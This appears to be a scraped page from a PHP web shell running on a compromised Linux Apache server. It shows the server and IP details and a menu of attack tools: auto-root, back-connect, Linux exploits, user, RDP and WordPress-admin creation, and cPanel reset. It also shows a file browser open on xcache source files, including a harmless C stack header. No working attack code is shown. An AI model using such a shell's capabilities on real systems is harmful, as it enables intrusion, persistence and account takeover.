Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
src /
xcache-3.2.0 /
util /
[ HOME SHELL ]
Name
Size
Permission
Action
.libs
[ DIR ]
drwxr-xr-x
README
49
B
-rw-rw-r--
xc_align.h
445
B
-rw-rw-r--
xc_foreachcoresig.h
589
B
-rw-rw-r--
xc_stack.c
1.12
KB
-rw-rw-r--
xc_stack.h
507
B
-rw-rw-r--
xc_stack.lo
312
B
-rw-r--r--
xc_trace.c
619
B
-rw-rw-r--
xc_trace.h
1.25
KB
-rw-rw-r--
xc_trace.lo
312
B
-rw-r--r--
xc_vector.h
1.3
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xc_stack.h
#ifndef __XC_UTIL_STACK #define __XC_UTIL_STACK typedef struct { void **data; int cnt; int size; } xc_stack_t; #define S xc_stack_t* void xc_stack_init_ex(S stack, int initsize); #define xc_stack_init(stack) xc_stack_init_ex(stack, 8) void xc_stack_destroy(S stack); void xc_stack_push(S stack, void *item); void *xc_stack_pop(S stack); void *xc_stack_top(S stack); void *xc_stack_get(S stack, int n); int xc_stack_count(S stack); void xc_stack_reverse(S stack); #undef S #endif /* __XC_UTIL_STACK */
Close